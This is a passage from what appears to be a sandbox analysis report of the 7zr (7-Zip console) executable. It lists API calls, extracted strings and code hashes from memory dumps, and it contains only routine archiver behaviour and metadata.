                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: 29cddcbdaca9b0fe318e1b32fc409b11cc8eccfd74c7996aa61ce9637fc50d8d
                        • Instruction ID: 0f4f79141f9d7a8809de38a740e3dc5d186bb8b694d074fc5918d91aa0b06c3e
                        • Opcode Fuzzy Hash: 29cddcbdaca9b0fe318e1b32fc409b11cc8eccfd74c7996aa61ce9637fc50d8d
                        • Instruction Fuzzy Hash: C491BE71610700ABDB21AA21CC41FAB73A8EF65750F1091A9FD4AE7241F738EE49C7E4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                        • API String ID: 3519838083-1909666238
                        • Opcode ID: 57c84be5d3cb32354f29c0cf256a6bf6307cb2a8edbaf7b2f4ddc04f26bf409b
                        • Instruction ID: 98f57b0b5cacd57c1a25f44b9c999b8992cf8474dc19d8ea2ea50b242e720afd
                        • Opcode Fuzzy Hash: 57c84be5d3cb32354f29c0cf256a6bf6307cb2a8edbaf7b2f4ddc04f26bf409b
                        • Instruction Fuzzy Hash: 07C1D3319003D99FCB17EF65C451AFE7B71AF0A300F1A82A9E0496B6E2D731AE45DB40
                        APIs
                        • __EH_prolog.LIBCMT ref: 003864F8
                        • GetCurrentThreadId.KERNEL32 ref: 00386508
                        • GetTickCount.KERNEL32 ref: 00386513
                        • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0038651E
                        • GetTickCount.KERNEL32 ref: 00386578
                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 003865C5
                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 003865EC
                          • Part of subcall function 00385D7A: __EH_prolog.LIBCMT ref: 00385D7F
                          • Part of subcall function 00385D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00385DA1
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                        • String ID: .tmp$d
                        • API String ID: 1989517917-2797371523
                        • Opcode ID: 8ca22f18af56c62b791fb0c521171aec5c13a10d7e77e4e3395f6c45846b7c1b
                        • Instruction ID: d4c29cdf3378bdc729429a657db91e0f29a612be624cc72afe1bad497a9a04be
                        • Opcode Fuzzy Hash: 8ca22f18af56c62b791fb0c521171aec5c13a10d7e77e4e3395f6c45846b7c1b
                        • Instruction Fuzzy Hash: 77411132A103249BCF17BFA0E8577EDB7B1FF56314F1401A9E802AB2A1CB388901CB55
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                        • API String ID: 1795875747-657955069
                        • Opcode ID: e52ce4fa6f90e0f848be112510c888911abb18063031dcd43f466f68885e57c2
                        • Instruction ID: 8b4d148ad5dc9a88b0c2778dd1e348a92071b77809d33c0688afceffd237f89d
                        • Opcode Fuzzy Hash: e52ce4fa6f90e0f848be112510c888911abb18063031dcd43f466f68885e57c2
                        • Instruction Fuzzy Hash: 82F0E231B042287BC62127917D81E2EFF69DF86764BB50077FA0443241EF6508658FA9
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CE774
                          • Part of subcall function 00383563: memmove.MSVCRT(?,?,00000022,00000000,?,00381DAE,00000000,00000000,00000000,00381D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 00383588
                          • Part of subcall function 003CE6C2: __EH_prolog.LIBCMT ref: 003CE6C7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$memmove
                        • String ID: H C$P C$T C$\ C$hcf$mtf$rsfx
                        • API String ID: 593149739-2986687590
                        • Opcode ID: 87f42ce1f1c9a407d9df613387bd24fe11d436126a3fc49cf8248087dce9e351
                        • Instruction ID: f008564e6ffa5939a845d1fc30d686cd1fb5300910492da362d3b874267faec3
                        • Opcode Fuzzy Hash: 87f42ce1f1c9a407d9df613387bd24fe11d436126a3fc49cf8248087dce9e351
                        • Instruction Fuzzy Hash: 2051E3359042059BCF26EBA0C491FFEB376AF44314F25C46EEC529B282DB789D09D751
                        APIs
                          • Part of subcall function 00417D80: WaitForSingleObject.KERNEL32(?,000000FF,0039AFD6,?), ref: 00417D83
                          • Part of subcall function 00417D80: GetLastError.KERNEL32(?,000000FF,0039AFD6,?), ref: 00417D8E
                          • Part of subcall function 00412FB0: EnterCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FB8
                          • Part of subcall function 00412FB0: LeaveCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FC2
                        • EnterCriticalSection.KERNEL32(?), ref: 0041290E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412928
                        • EnterCriticalSection.KERNEL32(?), ref: 00412992
                        • LeaveCriticalSection.KERNEL32(?), ref: 004129B8
                        • EnterCriticalSection.KERNEL32(?), ref: 00412A1E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412A56
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                        • String ID: v
                        • API String ID: 2116739831-3261393531
                        • Opcode ID: 83cff09d007c76906134833b0d471d94bd581d12a683f6e3dea83ea7fbb0523a
                        • Instruction ID: 29c6ef727bcf5e9770d121148d9babd9f260e605226f742fda1530f57519ba06
                        • Opcode Fuzzy Hash: 83cff09d007c76906134833b0d471d94bd581d12a683f6e3dea83ea7fbb0523a
                        • Instruction Fuzzy Hash: 58C17E752047058FC320DF25C6807A7B7E1BF88354F104A2EE5AAC7351EBB8E995CB59
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfputs
                        • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                        • API String ID: 1798449854-1259944392
                        • Opcode ID: 22934efe88a56ff6ccf0db8786ce92dbd99d296b0be6e3339b9a3795282b1a9b
                        • Instruction ID: e2210f54429e4a70f2415f4221f1f472f7bfd092e1b2fb05c2f715de2d45b420
                        • Opcode Fuzzy Hash: 22934efe88a56ff6ccf0db8786ce92dbd99d296b0be6e3339b9a3795282b1a9b
                        • Instruction Fuzzy Hash: F421B631B006149FCB06EB94D542AEEB3B4EF14314B50447AE602DBBA2DB78AD07CB84
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A091
                          • Part of subcall function 00389BAA: RegCloseKey.ADVAPI32(?,?,00389BA0), ref: 00389BB6
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseH_prolog
                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                        • API String ID: 1579395594-270022386
                        • Opcode ID: 412ed13c49b72e743fb53d345d1894461a5d3cfece99b55ec3e5fdbb990a7a9e
                        • Instruction ID: 8a5ab20a55523e033f56cc8ce59f502f5d40fc709a2edb10eedf67506145d0dc
                        • Opcode Fuzzy Hash: 412ed13c49b72e743fb53d345d1894461a5d3cfece99b55ec3e5fdbb990a7a9e
                        • Instruction Fuzzy Hash: 0C51B271A007059FDF12FF94D895AAEB7B5BF58300F5144AFE412A7241DB34A905CB91
                        APIs
                        • __EH_prolog.LIBCMT ref: 003DC453
                          • Part of subcall function 003DC1DF: __EH_prolog.LIBCMT ref: 003DC1E4
                          • Part of subcall function 003DC543: __EH_prolog.LIBCMT ref: 003DC548
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID: ((C$<(C$L(C$\(C
                        • API String ID: 3744649731-510830737
                        • Opcode ID: 913cc563b50273f5d51026cad418410382edfce0201d882e8a542751e57fafba
                        • Instruction ID: 9d89c0aae00d2a5d8cef5aec7cf527d333dd751358924f33f5397185e19548f4
                        • Opcode Fuzzy Hash: 913cc563b50273f5d51026cad418410382edfce0201d882e8a542751e57fafba
                        • Instruction Fuzzy Hash: D8218BB0910B50CEC725EF6AE54869BFBF4EF54304F108A1FD0968B711DBB46A08CB58
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B46D4
                        • EnterCriticalSection.KERNEL32(00442918), ref: 003B46E8
                        • CompareFileTime.KERNEL32(?,?), ref: 003B4712
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B476A
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                        • String ID: v
                        • API String ID: 3800395459-3261393531
                        • Opcode ID: 9dcc0f9032b565ff2efefba5313cef46d656072ceb79873b8cbc7f3fd70c8e4d
                        • Instruction ID: 6e4f757caed86f4cccfa0ddffc72e88a9194590916e2f7b16de541c32d5d91bd
                        • Opcode Fuzzy Hash: 9dcc0f9032b565ff2efefba5313cef46d656072ceb79873b8cbc7f3fd70c8e4d
                        • Instruction Fuzzy Hash: D221D171600201AFDB22CF64D485BDABBF4FF41308F108019E66687A12DB34FA49CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B4642
                        • EnterCriticalSection.KERNEL32(00442918), ref: 003B4656
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B4685
                        • LeaveCriticalSection.KERNEL32(00442918), ref: 003B46C5
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$EnterH_prolog
                        • String ID: v
                        • API String ID: 2532973370-3261393531
                        • Opcode ID: 5589766f5dcb0b074c81e4ab8a253786e14efc32a51bfb758936a58c48b5e6b8
                        • Instruction ID: ea92365fb386cfc3b359552c1d95aebfa17b78b723651645c6264099d4b28d04
                        • Opcode Fuzzy Hash: 5589766f5dcb0b074c81e4ab8a253786e14efc32a51bfb758936a58c48b5e6b8
                        • Instruction Fuzzy Hash: C6118C75B00210AFC721CF55D8C4AAEB7A8FF8A714B10822DE90AD7B01C774EC058B98
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B602A
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B6044
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B6060
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterH_prologLeave
                        • String ID: v$8)D
                        • API String ID: 367238759-2099984107
                        • Opcode ID: 69c5babd415f7c29529a22f79e87b52af58ee27d01895766a78635e40b5b462c
                        • Instruction ID: 26a82eb3199f815a0aba76ea25d87cd3ae4b815275be2148abd2c5c9c8e8bc1b
                        • Opcode Fuzzy Hash: 69c5babd415f7c29529a22f79e87b52af58ee27d01895766a78635e40b5b462c
                        • Instruction Fuzzy Hash: 94F09A36A04114EFC701DF88D949ADEBBB8FF49354F10806AF405A7211C7B89A00CBA8
                        APIs
                        • memset.MSVCRT ref: 003E03F5
                        • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 003E0490
                        • memset.MSVCRT ref: 003E0618
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memset$memcpy
                        • String ID: $@
                        • API String ID: 368790112-1077428164
                        • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                        • Instruction ID: b36b1881e540d40a043815af6a5c712a7eaaa60b7871e62e9f3fdca342508990
                        • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                        • Instruction Fuzzy Hash: DD91B130900399EFDB26DF66C841BDAB7B1EF50304F048659E5996A1D2D7B0BAD9CF80
                        APIs
                          • Part of subcall function 00412FB0: EnterCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FB8
                          • Part of subcall function 00412FB0: LeaveCriticalSection.KERNEL32(?,?,?,00412749), ref: 00412FC2
                        • EnterCriticalSection.KERNEL32(?), ref: 0041290E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412928
                        • EnterCriticalSection.KERNEL32(?), ref: 00412992
                        • LeaveCriticalSection.KERNEL32(?), ref: 004129B8
                        • EnterCriticalSection.KERNEL32(?), ref: 00412A1E
                        • LeaveCriticalSection.KERNEL32(?), ref: 00412A56
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID: v
                        • API String ID: 3168844106-3261393531
                        • Opcode ID: a87f7dc738b54688600db4454c876e54466056fa1d4871416f9f51df9c7eab10
                        • Instruction ID: 628d8bd62204d4822f1ea27dea00186db7381f0f86376e14bdd3339abd2da6f1
                        • Opcode Fuzzy Hash: a87f7dc738b54688600db4454c876e54466056fa1d4871416f9f51df9c7eab10
                        • Instruction Fuzzy Hash: 68611A756047018FC760DF24C680BA7B3E1BF84354F504A1EE9AAC7351EBB8E895CB59
                        APIs
                        • __EH_prolog.LIBCMT ref: 00386141
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                        • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00386197
                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 0038626E
                        • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 003862A9
                          • Part of subcall function 00386096: __EH_prolog.LIBCMT ref: 0038609B
                          • Part of subcall function 00386096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 003860DF
                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00386285
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$H_prolog$DeleteFile
                        • String ID:
                        • API String ID: 3586524497-0
                        • Opcode ID: fafe579619bb72d4d189c4f8dfddf07c79780bcd4964c6d8b54bb7e26a40fa60
                        • Instruction ID: 978b6abf2252d7161551de990d9b5271a916a13d9df1071f5fe7c04019fd6fb9
                        • Opcode Fuzzy Hash: fafe579619bb72d4d189c4f8dfddf07c79780bcd4964c6d8b54bb7e26a40fa60
                        • Instruction Fuzzy Hash: A851BB31C04328AADF17FBE4D886BEDBB79AF11340F1040E9E8417B192CB346A0ACB51
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003944DB
                        • memcmp.MSVCRT(?,00430128,00000010), ref: 003944EE
                        • memcmp.MSVCRT(?,00430228,00000010), ref: 0039450B
                        • memcmp.MSVCRT(?,00430248,00000010), ref: 00394528
                        • memcmp.MSVCRT(?,004301C8,00000010), ref: 00394545
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: 4b682ed1de69c6da47c7c59ebca9ff1c905e6491c748079341feae39b9d2165f
                        • Instruction ID: c85fc5adcd5913f972ac9f65f683ec2a49ff2d8f46e197246dc6d29ac166c1a1
                        • Opcode Fuzzy Hash: 4b682ed1de69c6da47c7c59ebca9ff1c905e6491c748079341feae39b9d2165f
                        • Instruction Fuzzy Hash: 5621F2727002086BEF058E25CC81FBE73ACAB553A4F12813AFD05CA241F668DD46A6D0
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 003E672A
                        • memcmp.MSVCRT(?,00430258,00000010), ref: 003E6747
                        • memcmp.MSVCRT(?,004302D8,00000010), ref: 003E675A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID:
                        • API String ID: 1475443563-0
                        • Opcode ID: 4db2276684e933fd02dd6e668a48122fc21475e9aa2bb699e84ccb8815e5c996
                        • Instruction ID: 3108364c25f8d30b6553cd857597bb79392104020633d7d8dd04e25fe2aee366
                        • Opcode Fuzzy Hash: 4db2276684e933fd02dd6e668a48122fc21475e9aa2bb699e84ccb8815e5c996
                        • Instruction Fuzzy Hash: 5721D4712402186BE7058E12CC82FBF73AC9B647E8F10422AFD059A282F678DD44A7D4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: !$LZMA2:$LZMA:
                        • API String ID: 3519838083-3332058968
                        • Opcode ID: 174e6ce88971d79e08e08ab886ddcc1260e650f6cdbf307ad12c876e39ebd97e
                        • Instruction ID: 646b7e06d5d21fe340b37ce6dfd86a31dc103d99687ec0a362df7bae1e473e34
                        • Opcode Fuzzy Hash: 174e6ce88971d79e08e08ab886ddcc1260e650f6cdbf307ad12c876e39ebd97e
                        • Instruction Fuzzy Hash: C461F23092010A9ECB17DB65C645FFD7BB5AF16300F2A60ADE40EEB162CB70AE80C740
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038A389
                          • Part of subcall function 0038A4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,0038A3C1,00000001), ref: 0038A4CD
                          • Part of subcall function 0038A4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0038A4DD
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AddressH_prologHandleModuleProc
                        • String ID: : $ SP:$Windows
                        • API String ID: 786088110-3655538264
                        • Opcode ID: f71890d2a07bb457ca48bf79a0c6c61ecf4c5aeca5b87369e245ed03874150dc
